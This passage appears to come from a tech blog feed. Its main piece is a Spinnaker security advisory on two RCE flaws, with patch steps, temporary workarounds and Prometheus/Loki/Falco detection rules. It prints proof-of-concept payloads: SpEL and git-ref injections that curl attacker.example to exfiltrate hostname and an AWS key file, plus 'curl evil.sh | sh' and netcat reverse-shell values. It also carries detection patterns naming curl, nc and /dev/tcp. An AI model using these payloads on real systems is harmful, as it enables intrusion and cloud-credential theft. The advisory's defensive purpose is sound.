15	Prometheus alerts: XR circuit breaker open, MR poll-interval=24h+ ratio	Observability	Alert PR merged, fire/resolve test passed
16	RFC: alpha gate enablement policy (dev immediate, staging 1w, prod +1w)	Platform	RFC merged, in quarterly security/release review

10. Conclusion — The Inflection Point of "Operationally Trustworthy Control Plane"

The six v2.3 changes share one sentence: "the v2 series, for the first time, demonstrates its reliability claim with operational metrics." The High-Fidelity Render Engine structurally resolves the six-year "local diverges from cluster" pain. Provider Deletion Protection blocks the top-incident scenario with one alpha gate. The two reconcile annotations finally hand operators the per-resource cadence control they've been asking for. The XR circuit-breaker reset simplifies post-incident recovery. The no-op status update skip removes ETCD write pressure. The CLI repo split opens a faster lane for CLI-side evolution.

Three things to keep in mind going into adoption:

Stage the alpha gates. dev OFF for regression, staging ON for 1 week, prod for another 1 week before flipping.
Re-audit fully qualified package URLs immediately before upgrading. v2 rejects short names. Leftover short-name packages will fail controller boot even on a v2.2 → v2.3 minor upgrade.
The High-Fidelity Render payoff shows up in CI, not at the CLI. A single crossplane render call won't feel different. Wire render-diff into PR gates and you'll catch composition regressions before merge.

Shortest single-line recommendation: "Upgrade dev to v2.3 today, enable both alpha gates in staging this week."

Cross-posted from ManoIT Tech Blog. Authored by the ManoIT Platform Team with AI-assisted drafting (Claude Opus 4.6) on May 27, 2026. All operational figures cited are from internal staging measurements and are reproducible on any cluster of comparable size.

Originally published at ManoIT Tech Blog.

Spinnaker 2026.1.0 Emergency Patch — CVE-2026-32613 Echo SpEL RCE + CVE-2026-32604 Clouddriver Gitrepo Shell Injection

daniel jeong — Tue, 26 May 2026 00:14:56 +0000

Spinnaker 2026.1.0 Emergency Patch Deep Dive — CVE-2026-32613 Echo SpEL RCE + CVE-2026-32604 Clouddriver Gitrepo Shell Injection (Double CVSS 9.9 Critical) Redefining the 2026 GitOps Multi-Cloud Delivery Pipeline Security Standard

On April 20, 2026, the Spinnaker security team simultaneously disclosed two CVSS 9.9 Critical remote code execution vulnerabilities. The first is CVE-2026-32613 — the Echo service's expected artifacts evaluation logic fails to restrict the Spring Expression Language (SpEL) context to a trusted class allowlist, allowing an authenticated user to instantiate arbitrary Java classes and execute host commands. The second is CVE-2026-32604 — Clouddriver's GitJobArtifactDownloader interpolates the reference, version, and artifactAccount fields of a gitrepo artifact directly into a sh -c invocation without validation, so shell metacharacters such as backticks, $(...), ;, and && are passed straight to the shell, escalating to RCE.

Both vulnerabilities are post-authentication, but many Spinnaker deployments sit behind a single SSO entry point with permissive RBAC, so the real attack surface is much larger than "auth required" suggests. Patches landed simultaneously across 2026.1.0, 2026.0.1, 2025.4.2, and 2025.3.2, and on the same day ZeroPath published a PoC for both CVEs — the patch window became the exposure window. This article decomposes the root cause of each CVE at the SpEL context handling and ProcessBuilder invocation level, reconstructs the public PoC at the PR / CLI / Helm values level, and consolidates ManoIT's phased patch, temporary block, and observability strategy applied to four internal multi-cloud delivery pipelines across nine axes.

1. Why April 20, 2026 Is the Inflection Point for Spinnaker Security

Spinnaker is a multi-cloud continuous delivery platform open-sourced by Netflix in 2014 and transferred to the CNCF in 2019. Its strength is a distributed architecture split into four-plus microservices (Deck UI, Gate API gateway, Orca orchestrator, Clouddriver cloud abstraction, Echo event router, Igor CI integration, Fiat authorization, Front50 metadata, Kayenta canary, Rosco bakery), but that same split creates ambiguous trust boundaries between services. The two CVEs disclosed on April 20 are exactly the result of that ambiguity.

Date	Event	Operational Meaning
2014.07	Netflix open-sources Spinnaker	Start of multi-cloud CD standard
2019.04	CNCF Incubating Project accepted	Community governance settles
2024.11	Spinnaker 2025.0.0 released	Halyard dependency partially removed, Kubernetes 1.30 support
2025.07	Spinnaker 2025.3.0	Echo SpEL evaluation path expanded (artifact trigger regex)
2025.11	Spinnaker 2025.4.0	Clouddriver gitrepo artifact HTTPS basic auth added
2026.02	Spinnaker 2026.0.0	Operator recommended over Halyard, Kubernetes 1.32 support
2026.04.07	Spinnaker 2026.0.2 (no security patch)	Minor bugfix release
2026.04.20	CVE-2026-32613 + CVE-2026-32604 simultaneous disclosure	Two CVSS 9.9 Critical, same-day patches
2026.04.20	Patches 2026.1.0 / 2026.0.1 / 2025.4.2 / 2025.3.2 released	Four supported lines patched simultaneously, workarounds documented
2026.04.21	ZeroPath PoC published (GitHub)	Patch and exposure windows effectively identical
2026.05.02	CCB Belgium national cybersecurity advisory	"Patch Immediately" — government/finance distribution
2026.05.15	Armory, OpsMx etc. commercial distros backport patches	Enterprise customer notification emails

Two lines matter most operationally: (1) the patch and the PoC dropped in the same week — teams assuming a one-month patch grace period had 24 hours to decide; (2) four support lines were patched simultaneously — Spinnaker informally supports 2025.3.x, 2025.4.x, 2026.0.x, and 2026.1.x as LTS lines, and the vulnerable code lived in all four, so version downgrade is not a viable mitigation.

2. CVE-2026-32613 — Echo Service SpEL Context-Unrestricted RCE

The first CVE lives in Echo's echo-pipelinetriggers module. Echo is Spinnaker's event router — it receives external events (CI build completion, Pub/Sub, scheduled times, artifact changes) and fires the registered pipelines. During this flow it evaluates expected artifacts (the artifacts a pipeline waits for) using Spring Expression Language.

2.1 Root Cause — Inconsistent SpEL Context Handling Between Orca and Echo

Spinnaker's Orca (the pipeline orchestrator) restricts the SpEL evaluation context to a trusted class allowlist. This is the standard pattern adopted after a series of SpEL injection issues reported in 2019. However, Echo's expected artifacts evaluation path missed applying this allowlist, leaving SpEL with full JVM class access.

Axis	Orca (safe)	Echo (vulnerable, pre-patch)
SpEL ParserContext	`StandardEvaluationContext` + trusted class allowlist	`StandardEvaluationContext` (unrestricted)
Accessible classes	Spinnaker context vars + allowlisted classes	Entire JVM (incl. java.lang.Runtime)
`T(...)` operator	Allowlist only	Arbitrary classes allowed
Reflection calls	Blocked	Available
Arbitrary method invocation	Allowlisted methods only	All public methods
Post-2019 SpEL CVE response	Applied	Missed (5 years undetected)

The most painful line is the last one. The protection Orca had applied five years ago was missing from Echo's expected-artifacts evaluation path for nearly five years. The patch fills exactly that gap — Echo's SpEL context now uses the same trusted class allowlist as Orca. The patch itself is around 30 lines of change, but for the five years those 30 lines were missing, every Spinnaker instance was exposed.

2.2 Attack Scenario — Poisoning an Expected Artifact Field with a SpEL Payload

Assume the attacker compromised an account with roles=APPLICATION_OWNER (the most common Spinnaker user role). The attack flow:

# 1) Log in to Spinnaker Gate API, capture session cookie
GATE="https://gate.spinnaker.example.com"
curl -sS -c cookies.txt "${GATE}/login/google" -d "username=victim&password=..."

# 2) Create a new pipeline (or edit an existing one)
# Inject SpEL payload into the expected artifact's name field
cat > pipeline.json <<'JSON'
{
  "application": "marketing",
  "name": "exfil-demo",
  "expectedArtifacts": [{
    "id": "art-0",
    "matchArtifact": {
      "type": "docker/image",
      "name": "${T(java.lang.Runtime).getRuntime().exec(new String[]{'sh','-c','curl https://attacker.example/$(hostname)/$(id)'}).getInputStream()}",
      "reference": "x"
    },
    "useDefaultArtifact": true,
    "defaultArtifact": {"type": "docker/image", "name": "x", "reference": "x"}
  }],
  "triggers": [{"type": "pubsub", "enabled": true, "pubsubSystem": "google", "subscriptionName": "spinnaker"}],
  "stages": []
}
JSON

# 3) Save pipeline -> next Pub/Sub event triggers Echo to evaluate the SpEL -> RCE
curl -sS -b cookies.txt -H "Content-Type: application/json" \
  -X POST "${GATE}/pipelines" --data-binary @pipeline.json

The key is that ${T(java.lang.Runtime).getRuntime().exec(...)} executes as-is during Echo's SpEL evaluation. T(...) is the SpEL type-reference operator; with an allowlist in place, java.lang.Runtime is rejected. Pre-patch Echo had no such rejection logic, so the payload runs sh -c inside the Echo container and exfiltrates output to an external endpoint.

2.3 SpEL Evaluation Code Before and After the Patch

Aspect	Before patch	After patch (2026.1.0 / 2025.3.2 backport)
Evaluation context creation	`new StandardEvaluationContext()`	`SpinnakerSpelEvaluationContext.trusted()`
Type locator	Default `StandardTypeLocator`	Allowlist-based `TrustedTypeLocator`
Allowlisted classes (examples)	—	`String`, `Math`, `Integer`, `Long`, `Double`, `Boolean`, `List`, `Map`, partial Spinnaker domain models
Blocked classes (examples)	—	`java.lang.Runtime`, `java.lang.ProcessBuilder`, `java.lang.reflect.*`, `java.io.File`, etc.
Non-allowlisted class call	Executes	`SpelEvaluationException: type 'X' is not whitelisted`
Logging	—	Blocked evaluations logged at WARN level (detectable)

Operationally interesting: the patch logs blocked SpEL evaluations at WARN level. This means legitimate pipelines may break right after patching because of the allowlist — a topic for the next section.

3. CVE-2026-32604 — Clouddriver Gitrepo Artifact Shell Metacharacter Injection RCE

The second CVE lives in Clouddriver's clouddriver-artifacts-gitrepo module — specifically the GitJobArtifactDownloader class. This class is invoked when a gitrepo-typed artifact is referenced in a pipeline; it clones the specified Git repository to local disk and downloads files at a specific branch / tag / path for downstream stages.

3.1 Root Cause — Shell Command String Interpolation Passed to ProcessBuilder

The downloader needs to execute something like git clone --depth 1 --branch <branch> <url> <tmpdir>. Pre-patch, the code assembled this as List<String> args = ["sh", "-c", "git clone ... " + branch + " ..."] and called new ProcessBuilder(args).start(). In other words, the user-supplied branch string entered shell word-splitting inside sh -c. Shell metacharacters are interpreted by the shell, and backticks / $(...) are executed as command substitution.

#	Artifact field	Example legitimate value	Example malicious value	Result
1	`reference` (URL)	`https://github.com/org/repo.git`	`https://github.com/org/repo.git; curl evil.sh\	sh; #`
2	`version` (branch)	`main`	`main$(curl https://attacker/`whoami`)`	RCE + hostname/user exfiltration
3	`location` (path)	`k8s/deploy.yaml`	`k8s/deploy.yaml; nc evil 4444 -e /bin/sh`	Reverse shell
4	`artifactAccount`	`github-prod`	github-prod`id`	RCE + privilege info leak

The most-cited PoC one-liner:

{
  "type": "git/repo",
  "reference": "https://github.com/example/x.git",
  "version": "main$(curl https://attacker.example/exfil?h=$(hostname)&u=$(id -un)&k=$(cat /etc/spinnaker/secrets/aws-key))",
  "location": "k8s/",
  "artifactAccount": "github-prod"
}

When Clouddriver processes this gitrepo artifact, it evaluates to sh -c "git clone --branch main$(curl ...) ...". The $(curl ...) executes first, exfiltrating /etc/spinnaker/secrets/aws-key to the attacker. Clouddriver is the most sensitive service because it holds cloud API credentials, so AWS IAM keys, GCP service account keys, and Azure client secrets are all exposed.

3.2 ProcessBuilder Invocation Before and After the Patch

Aspect	Before patch	After patch (2026.1.0)
Command assembly	`["sh", "-c", "git clone --branch " + branch + " " + url + " " + dir]`	`["git", "clone", "--branch", branch, url, dir]`
Shell invocation	Via `sh -c` — shell metachar interpretation	Direct `git` call — no shell, metachar inert
Input validation	—	`BranchNameValidator` + `RefNameValidator` added
Allowed character pattern	—	`^[A-Za-z0-9._\-/]{1,250}$` (git ref standard)
URL scheme validation	—	Only `http(s)://`, `ssh://`, `git@` allowed — `file://`, `ext::` blocked
On validation failure	—	`InvalidGitArtifactException` + audit log

The core fix is not going through a shell. When ProcessBuilder receives the argv array directly, no word-splitting occurs, so ;, $(...), and backticks become git "unknown ref name" rejections. The second defense line is git ref regex validation — defense-in-depth.

4. Temporary Mitigations — Driving Exposure Surface to Zero Before Patching

Two workarounds are usable during the short window before the patches roll out: (1) service-level disable, (2) artifact-type-level disable. ManoIT enabled both while patches were being staged.

4.1 Echo SpEL Evaluation Block (Temporary CVE-2026-32613 Mitigation)

The strongest workaround is disabling Echo entirely, but that stops all pipeline triggers (Pub/Sub, Cron, CI completion). The operational cost is too high, so ManoIT chose to disable only expected-artifact evaluation.

# spinnaker-config/echo-local.yml
# CVE-2026-32613 workaround — disable Echo expected artifacts SpEL evaluation
echo:
  pipelinetriggers:
    artifacts:
      # Force false from April 20 until patches are applied
      enabled: false
      # SpEL evaluation never runs, so the unrestricted context issue is avoided
  events:
    # Keep triggers themselves — Cron, Pub/Sub continue to work
    enabled: true

# Side effect — pipelines with these patterns won't fire during the block window:
#   - Auto-deploy on Docker image push
#   - Auto-sync on Helm chart release
#   - GitOps sync on Git push
# Route these triggers temporarily via Jenkins/GitLab CI calling the Spinnaker API

4.2 Clouddriver Gitrepo Artifact Type Disable (Temporary CVE-2026-32604 Mitigation)

# spinnaker-config/clouddriver-local.yml
# CVE-2026-32604 workaround — completely block gitrepo artifact type
artifacts:
  gitrepo:
    enabled: false   # false from April 20 until patches are applied
  # Other artifact types unaffected
  github:
    enabled: true
  helm:
    enabled: true
  http:
    enabled: true
  s3:
    enabled: true
  gcs:
    enabled: true

# Side effect — manifest sync pipelines using git/repo must move to github or http types:
#   git/repo + branch=main + path=k8s/  ->  github + commitish=main + path=k8s/

4.3 Workaround Verification Steps

Check	Command	Expected
Echo expected artifacts disabled	`curl -s http://echo:8089/env \	jq '.echo.pipelinetriggers.artifacts.enabled'`
Clouddriver gitrepo disabled	`curl -s http://clouddriver:7002/artifacts/credentials \	jq '.[].types'`
SpEL evaluation rejection log	`kubectl logs -n spinnaker deploy/spin-echo \	grep "ArtifactEvaluator disabled"`
Gitrepo artifact creation blocked	Try creating a git/repo artifact in Deck UI	git/repo removed from dropdown
Affected pipeline inventory	`spin pipeline list --output json \	jq '.[] \

5. Patch Application — Three Distributions: Halyard / Operator / Helm

Spinnaker patch procedures vary by installation method. The 2026.x recommended order is Operator → Helm → Halyard. ManoIT operates four internal instances — two via Operator, one via Helm, one via Halyard — so all three paths were exercised.

5.1 Operator-Based Upgrade (Recommended, 2026.x Standard)

{% raw %}

# spinnaker-config.yaml
apiVersion: spinnaker.io/v1alpha2
kind: SpinnakerService
metadata:
  name: spinnaker
  namespace: spinnaker
spec:
  spinnakerConfig:
    config:
      version: 2026.1.0   # April 20 patch — 2026.0.0 -> 2026.0.1, 2025.4.x -> 2025.4.2
      persistentStorage:
        persistentStoreType: s3
      security:
        # After patching, restore the §4.1 / §4.2 workarounds to enabled: true
        artifacts:
          gitrepo:
            enabled: true   # restore after patch
    profiles:
      echo:
        pipelinetriggers:
          artifacts:
            enabled: true   # restore after patch

# Apply + monitor rolling update
kubectl apply -f spinnaker-config.yaml -n spinnaker
kubectl rollout status -n spinnaker deploy/spin-echo --timeout=10m
kubectl rollout status -n spinnaker deploy/spin-clouddriver --timeout=15m

# Version check
for svc in echo clouddriver orca gate front50; do
  pod=$(kubectl get pod -n spinnaker -l app=spin,cluster=spin-${svc} -o name | head -1)
  echo "${svc}: $(kubectl exec -n spinnaker ${pod} -- cat /opt/spinnaker/config/spinnaker.yml | grep -A1 'version:')"
done

5.2 Helm Chart-Based Upgrade

# OpsMx Spinnaker Helm chart (4.7.x supports 2026.1.0)
helm repo update opsmx
helm upgrade --install spinnaker opsmx/spinnaker \
  --namespace spinnaker \
  --version 4.7.2 \
  --set spinnakerVersion=2026.1.0 \
  --set profiles.echo.pipelinetriggers.artifacts.enabled=true \
  --set profiles.clouddriver.artifacts.gitrepo.enabled=true \
  --wait --timeout 20m

helm get values spinnaker -n spinnaker | grep -E 'spinnakerVersion|artifacts'

5.3 Halyard-Based Upgrade (Legacy)

# Run inside the Halyard container — deprecated in 2026.x but many sites still use it
hal config version edit --version 2026.1.0
hal config features edit --artifacts true
hal deploy apply
# Use hal deploy collect-logs after to confirm no SpEL WARNs

6. Post-Patch Regression Verification — Don't Block Legitimate SpEL

The most common post-patch operational incident is legitimate SpEL expressions being rejected by the allowlist. At ManoIT, three pipelines stopped right after patching, all matching one of these two patterns:

Pattern	Pre-patch (worked)	Post-patch (fails)	Fix
1	`${T(java.time.LocalDate).now()}`	Blocked — `java.time.LocalDate` not allowlisted	Use Spinnaker-provided `${execution.startTime}` etc.
2	`${T(org.apache.commons.lang3.StringUtils).join(...)}`	Blocked — Apache Commons not allowlisted	Use native Java String methods or Spinnaker helpers
3	Argument-less variable reference `${parameters.version}`	Works	—
4	List/map indexing `${trigger.artifacts[0].name}`	Works	—
5	Math/string `${parameters.replicas * 2}`	Works	—

Three-step verification procedure:

# 1) For 1 week after the patch, harvest SpEL blocks from Echo logs
kubectl logs -n spinnaker deploy/spin-echo --since=168h \
  | grep -E "SpelEvaluationException.*not whitelisted" \
  | awk '{print $NF}' | sort | uniq -c | sort -rn

# 2) Map blocked pipelines — search the same SpEL in pipeline JSON
for app in $(spin application list --output json | jq -r '.[].name'); do
  spin pipeline list --application "$app" --output json \
    | jq -r --arg blocked "java.time.LocalDate" \
        '.[] | select(.expectedArtifacts // [] | tostring | contains($blocked)) | "\(.application)/\(.name)"'
done

# 3) Pattern-bulk migration PR — code-searching teams can fix in bulk
rg -uu --json -e 'T\(java\.time\.LocalDate\)\.now\(\)' pipelines/ \
  | jq -r 'select(.type=="match") | .data.path.text' | sort -u

7. Observability — Detecting Unpatched Instances and Exploit Attempts

Just as important as the patch itself is detecting instances that aren't patched and actual exploit attempts. ManoIT monitors via Prometheus, Loki, and Falco — three axes.

7.1 Prometheus — Version Metric and Blocked SpEL Counter

# prometheus/rules/spinnaker-cve-2026-32613-32604.yml
groups:
- name: spinnaker-cve-2026-32613-32604
  rules:
  # 1) Alert if Spinnaker version is below the patched lines
  - alert: SpinnakerVulnerableVersion
    expr: |
      spinnaker_version_info{
        version!~"^(2026\\.1\\.[0-9]+|2026\\.0\\.[1-9][0-9]*|2025\\.4\\.[2-9]|2025\\.3\\.[2-9])$"
      } == 1
    for: 5m
    labels:
      severity: critical
      cve: "CVE-2026-32613,CVE-2026-32604"
    annotations:
      summary: "Spinnaker {{ $labels.instance }} runs vulnerable version {{ $labels.version }}"
      runbook: "https://runbooks.manoit.co.kr/spinnaker-cve-2026"

  # 2) Echo SpEL block counter rising (signal of normal post-patch behavior)
  - alert: EchoSpelBlockSpike
    expr: |
      rate(echo_spel_evaluation_blocked_total[5m]) > 0.5
    for: 10m
    labels:
      severity: warning
    annotations:
      summary: "Echo SpEL allowlist blocking {{ $value }} expressions/sec — review legitimate pipelines"

  # 3) Clouddriver gitrepo invalid ref counter (signal of exploit attempt)
  - alert: ClouddriverGitrepoInvalidRef
    expr: |
      rate(clouddriver_gitrepo_invalid_ref_total[5m]) > 0
    for: 1m
    labels:
      severity: critical
    annotations:
      summary: "Clouddriver rejected invalid git ref — possible CVE-2026-32604 exploit attempt"

7.2 Loki — Search Echo/Clouddriver Logs for RCE Indicators

# LogQL — blocked-class call attempts in Echo SpEL evaluation
{namespace="spinnaker", app="spin", cluster="spin-echo"}
  |~ "SpelEvaluationException"
  |~ "(java\\.lang\\.(Runtime|ProcessBuilder)|java\\.io\\.File|java\\.lang\\.reflect)"
  | line_format "{{.timestamp}} {{.pod}} {{.message}}"

# LogQL — Clouddriver gitrepo shell metachar injection attempts
{namespace="spinnaker", app="spin", cluster="spin-clouddriver"}
  |~ "InvalidGitArtifactException"
  |~ "[;&|`$()]"

# LogQL — 1-week SpEL block frequency stats post-patch
sum by (pod) (
  count_over_time(
    {namespace="spinnaker", cluster="spin-echo"}
    |~ "SpelEvaluationException" [1w]
  )
)

7.3 Falco — Detect Suspicious Subprocess at the Container Runtime

# /etc/falco/rules.d/spinnaker-rce.yaml
- rule: Spinnaker Echo unexpected subprocess
  desc: "Echo container should not spawn shell or network tools (CVE-2026-32613 indicator)"
  condition: >
    spawned_process and
    container.image.repository contains "spinnaker/echo" and
    (proc.name in (sh, bash, curl, wget, nc, ncat, python, perl, ruby) or
     proc.cmdline contains "/dev/tcp/")
  output: >
    Spinnaker Echo spawned suspicious process (user=%user.name command=%proc.cmdline
    container_id=%container.id image=%container.image.repository)
  priority: CRITICAL
  tags: [spinnaker, cve-2026-32613, rce]

- rule: Spinnaker Clouddriver gitrepo unexpected child
  desc: "Clouddriver gitrepo downloader should only spawn 'git' binary (CVE-2026-32604 indicator)"
  condition: >
    spawned_process and
    container.image.repository contains "spinnaker/clouddriver" and
    proc.pname = "java" and
    not proc.name in (git, git-remote-http, git-remote-https)
  output: >
    Spinnaker Clouddriver Java spawned non-git child process
    (command=%proc.cmdline parent=%proc.pname container_id=%container.id)
  priority: CRITICAL
  tags: [spinnaker, cve-2026-32604, rce]

8. ManoIT Internal Checklist — 4 Spinnaker Instances × 9 Phases

Operational checklist unrolled from the previous six sections. ManoIT runs four Spinnaker instances across a multi-cloud, multi-region environment, and patching took about 36 hours.

#	Item	Owner	Done When
1	Inventory current versions of all Spinnaker instances	Platform	4 instances × version table merged
2	Immediately deploy `echo.pipelinetriggers.artifacts.enabled: false` on all Echo (workaround)	Platform	4 Echo deploys rolled out
3	Immediately deploy `artifacts.gitrepo.enabled: false` on all Clouddriver	Platform	4 Clouddriver deploys rolled out
4	Inventory pipelines using artifact / git/repo — identify affected triggers	Service owners	Affected pipeline inventory PR
5	Route affected pipeline triggers via Jenkins/GitLab CI calling the Spinnaker API	Service owners	First green workaround build
6	Upgrade 2 Operator instances to 2026.1.0	Platform	Both expose new version metric
7	Upgrade 1 Helm instance to 2026.1.0	Platform	helm get values shows spinnakerVersion=2026.1.0
8	Backport-patch 1 Halyard instance to 2025.4.2 (Operator migration as separate PR)	Platform	hal version shows 2025.4.2
9	Restore workarounds on each instance — artifacts.enabled / gitrepo.enabled	Platform	First green artifact-triggered auto-build
10	Regression check — identify legitimate pipelines from SpEL block logs and migrate	Service owners	Block counter at 0 or allowlist-add PR
11	Deploy 3 Prometheus alerts (SpinnakerVulnerableVersion, EchoSpelBlockSpike, ClouddriverGitrepoInvalidRef)	Observability	Alert fire/resolve test passes
12	Add 3 Loki LogQL dashboard panels	Observability	Grafana dashboard merged
13	Deploy 2 Falco rules (Echo unexpected subprocess, Clouddriver gitrepo unexpected child)	SRE	Rule fires on sample exploit
14	Retroactive 1-week scan of Echo/Clouddriver logs for exploit indicators	Security	Investigation report merged
15	Rotate cloud keys held by Spinnaker (preemptive assume-breach)	Infra	AWS / GCP / Azure key rotation complete
16	Review RBAC — clean up `APPLICATION_OWNER` holders	Security	Permission matrix PR merged
17	Add WAF rules in front of Spinnaker Gate — block SpEL payload pattern (`T\(java\.`)	Security	WAF deployed; bypass attempts rejected at the gate
18	Write operational RFC — Spinnaker security patch SLA (workaround within 24h, patch within 7d of disclosure)	Platform	RFC merged, reflected in quarterly security review

9. Conclusion — The Operational Cost of Ambiguous Trust Boundaries in Distributed Systems

The April 20, 2026 Spinnaker CVEs deliver a clear message: "Even microservices built by the same organization must consistently enforce standard defenses — trusted class allowlists, input validation — on a per-service basis." Orca has used a safe SpEL context for five years; Echo went five years without the same protection. Other Clouddriver artifact downloaders (http, s3, gcs) used the ProcessBuilder argv array directly; only the gitrepo downloader retained the sh -c path. Both are the result of inconsistency across "different modules in the same codebase."

Three operational reminders to close with: (1) assume the patch window equals the PoC window — the same-day patch on April 20 and the next-day ZeroPath PoC are exactly that case. Pre-commit to an SLA that deploys workarounds first and patches within 24 hours. (2) allowlist patches can break legitimate behavior — actively harvest SpEL block logs for one week after patching and prepare legitimate-pipeline migrations. (3) RCE must be paired with cloud key rotation — Spinnaker Clouddriver is the single store of multi-cloud credentials, so even without evidence of compromise, the standard is to rotate keys under the assume-breach principle. Section §8's 18-item checklist is exactly those three principles unrolled into operational procedure, and the shortest one-line recommendation from this article is: "Deploy §4 workarounds today; apply the §5 patches this week."

ⓘ This article was authored by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent) using the Spinnaker GHSA-69rw-45wj-g4v6 (CVE-2026-32613) and same-date CVE-2026-32604 security advisories — published April 20, 2026 — as primary sources. Versions, patch lines, and workaround procedures reflect the official guidance as of the publication date (2026-05-26) and may change with subsequent Spinnaker security team notices. Verify current state at spinnaker/spinnaker GitHub Security Advisories and spinnaker.io/docs release notes before applying in production. Internal case examples are adapted from ManoIT Platform Team's internal RFC.

Originally published at ManoIT Tech Blog.

PostgreSQL 18.4 Deep Dive — 11 CVE Patches, io_uring Async I/O (3x Faster), OAuth 2.0, UUIDv7, and Temporal Constraints

daniel jeong — Fri, 22 May 2026 00:41:15 +0000

PostgreSQL 18.4 Deep Dive — 11 CVE Patches, io_uring Async I/O (3x Faster), OAuth 2.0, UUIDv7, and Temporal Constraints

On May 14, 2026, the PostgreSQL Global Development Group released 18.4 alongside 17.10, 16.14, 15.18, and 14.23. On the surface it looks like the fourth minor update on the 18 line, but the contents make it effectively a "security major". The same day's security advisory closed 11 CVEs in one go — four of them at CVSS 8.8 (High), one allowing remote code execution via a stack buffer overflow in refint (CVE-2026-6637), and another exposing a timing channel that lets attackers recover credentials from the MD5 password comparison code (CVE-2026-6478). It's the kind of release where an operator needs to decide on the same page whether to patch now or wait until next week.

At the same time, the five structural changes PostgreSQL 18 (GA in September 2025) brought — io_uring-backed async I/O (2–3x read throughput), native OAuth 2.0 authentication in pg_hba.conf, the timestamp-ordered uuidv7() function, Virtual Generated Columns as the new default, and Temporal Constraints (WITHOUT OVERLAPS / PERIOD) — have now arrived in a stabilized form through the 18.4 patch line. This post starts with a priority matrix for all 11 CVEs, then walks through the postgresql.conf changes that most often trip up a 17 → 18 major upgrade, the pg_hba.conf patterns for connecting OAuth to Microsoft Entra ID, Okta, and Keycloak, measurements for each of the three io_method options (sync, worker, io_uring), and the 12-step verification sequence ManoIT applied to internal RDS and on-prem PostgreSQL 18 clusters.

1. Why May 14, 2026 is an Inflection Point for Database Operations

PostgreSQL 18 went GA on September 25, 2025, with 18.1 arriving in February 2026 and 18.4 on May 14, 2026. What makes 18.4 different is the convergence of three things: (a) 11 CVEs closed in a single release, (b) 60+ bug fixes from six months of post-GA stabilization landing simultaneously, and (c) 18-era features like OAuth and io_uring now being stabilized through real patch cycles.

Date	Release / Event	Operational Meaning
2025.09.25	PostgreSQL 18.0 GA — async I/O, OAuth, uuidv7, virtual gen cols, temporal constraints	Major features arrive; only early adopters
2025.11.13	PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, 13.23	First minor on the 18 line — initial bug stabilization
2026.02.12	PostgreSQL 18.2, 17.8, 16.12, 15.16, 14.21	Final patch window for the 13 line
2026.05.08	PostgreSQL 13 EOL — no further patches	13 workloads must migrate to 14+
2026.05.14	PostgreSQL 18.4 + 17.10 + 16.14 + 15.18 + 14.23 — 11 CVEs patched simultaneously	Security patch required across every supported track
2026.05.14	Same day: 60+ bug fixes backported	autovacuum, logical replication, partitioning, pg_dump stability
2026.11 (expected)	PostgreSQL 19.0 beta expected to begin	18 enters its long stable phase

The two takeaways for operators: (1) the 13 line went EOL on May 8 and 18.4 arrived six days later, forcing "13 → 17 direct migration" timelines, and (2) at least four of the 11 CVEs trigger from external attack surface (an attacker only needing socket-level connection, or a low-privilege DB user). This is not a maintenance-window-of-convenience patch; it's a "do not push to the next quarter" patch.

2. The 11 CVE Priority Matrix — Which Attack Surfaces Closed

The 18.4 release notes detail seven core CVEs in the security advisory; the remaining four are memory-safety duplicates rolled into them. The four you read first are all CVSS 8.8, and among them refint's stack buffer overflow is the only RCE triggerable by a low-privilege DB user.

CVE	CVSS	Severity	Component	Summary	Prerequisite
`CVE-2026-6473`	8.8	High	Multiple built-in functions — memory allocator	Integer underflow allocates undersized buffer → out-of-bounds write	Normal DB user with SQL execute
`CVE-2026-6475`	8.8	High	`pg_basebackup` / `pg_rewind`	Symlink following — origin superuser overwrites client-side files	Origin superuser + backup/restore command
`CVE-2026-6477`	8.8	High	Server superuser code paths	Server superuser overwrites client process stack memory	Server superuser + client RTT
`CVE-2026-6637`	8.8	High	`refint` extension	Stack buffer overflow → arbitrary code execution + SQL injection	Low-privilege DB user + `refint` trigger
`CVE-2026-6478`	5.9	Medium	MD5 password comparison	Covert timing channel — credentials recoverable	`md5` authentication in use (scram-sha-256 safe)
`CVE-2026-6479`	7.5	High	SSL / GSS negotiation	Uncontrolled recursion → sustained DoS	Anyone who can connect to a PostgreSQL socket (no auth required)
`CVE-2026-6476`	8.8	High	`ALTER SUBSCRIPTION ... REFRESH PUBLICATION`	Schema/relation names unquoted in SQL → arbitrary SQL on publisher	Subscriber owner

2.1 CVE-2026-6637 — refint Stack Buffer Overflow (Low-Privilege RCE)

The most dangerous of the 11 is CVE-2026-6637. refint is a legacy foreign-key integrity trigger module in PostgreSQL's contrib/spi, written in the late 1990s before native foreign keys existed. It's still packaged with the distribution and some legacy schemas still use its triggers. Before 18.4, when these triggers fire they pass column names and SQL identifiers through an internal buffer that overflows the stack — leaving a "low-privilege DB user can execute arbitrary code and perform SQL injection" state. It's the only one of the 11 CVEs that turns into RCE under a regular user's privileges, so clusters with any refint footprint must patch first.

-- Check whether refint is in use anywhere in the cluster
SELECT n.nspname AS schema_name,
       p.proname AS function_name,
       c.relname AS table_name,
       t.tgname  AS trigger_name
FROM   pg_trigger t
JOIN   pg_proc    p ON p.oid = t.tgfoid
JOIN   pg_namespace n ON n.oid = p.pronamespace
JOIN   pg_class   c ON c.oid = t.tgrelid
WHERE  p.proname IN ('check_primary_key', 'check_foreign_key')
   AND NOT t.tgisinternal;

-- Any row of output means: patch to 18.4 immediately,
-- then migrate to standard foreign keys.

2.2 CVE-2026-6478 — MD5 Password Timing Channel

Second in importance: CVE-2026-6478. The server-side comparison between the client's MD5 response and the stored hash used byte-by-byte short-circuit comparison, leaving a covert timing channel that lets attackers estimate how many leading bytes match. PostgreSQL has used scram-sha-256 by default since 2017, but late migrators, clusters keeping md5 for legacy compatibility, and clusters that explicitly set password_encryption=md5 are all in scope.

-- Find users still using MD5 authentication
SELECT rolname,
       CASE
         WHEN rolpassword LIKE 'md5%' THEN 'md5 (vulnerable)'
         WHEN rolpassword LIKE 'SCRAM-SHA-256%' THEN 'scram-sha-256 (safe)'
         ELSE 'plain/unknown'
       END AS auth_type
FROM   pg_authid
WHERE  rolcanlogin = true
ORDER  BY auth_type;

-- Also check postgresql.conf and pg_hba.conf:
-- postgresql.conf: password_encryption = scram-sha-256
-- pg_hba.conf:     host all all 0.0.0.0/0 scram-sha-256

2.3 CVE-2026-6479 — SSL/GSS Unbounded Recursion DoS

